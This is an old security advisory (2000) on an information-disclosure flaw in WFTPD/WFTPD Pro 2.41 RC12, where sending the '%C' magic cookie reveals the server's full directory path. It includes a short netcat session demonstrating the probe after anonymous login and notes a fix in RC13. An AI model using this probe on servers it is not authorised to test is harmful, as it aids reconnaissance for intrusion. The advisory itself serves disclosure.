WFTPD/WFTPD Pro 2.41 RC12 devulges sensitive information by revealing the full path of the current directory. This is fixed in WFTPD/WFTPD Pro 2.41 RC13. Exploit details included.
193366b65a5b1cdd836be3470f4aa6808039ca44452fe3c05bb6a2925d08ca56
================================================================
BluePanda Vulnerability Announcement: WFTPD/WFTPD Pro 2.41 RC12
05/09/2000 (dd/mm/yyyy)
bluepanda@dwarf.box.sk
http://bluepanda.box.sk/
================================================================
Problem: "Magic cookie" %C devulges sensitive information.
Vulnerable: WFTPD/WFTPD Pro 2.41 RC12, and prior.
Immune: WFTPD/WFTPD Pro 2.41 RC13.
Vendor status: Notified. A fix has been released.
==========
Details:
==========
Use of the "magic cookie" %C reveals the full path of the current directory,
ie:
C:\>nc panda 21
220 WFTPD 2.4 service (by Texas Imperial Software) ready for new user
user anonymous
331-Anonymous user access allowed - please enter your email
331-address as the password:
331 Give me your password, please
pass
230 Logged in successfully
%C
500 Unidentified command D:\FTPROOT\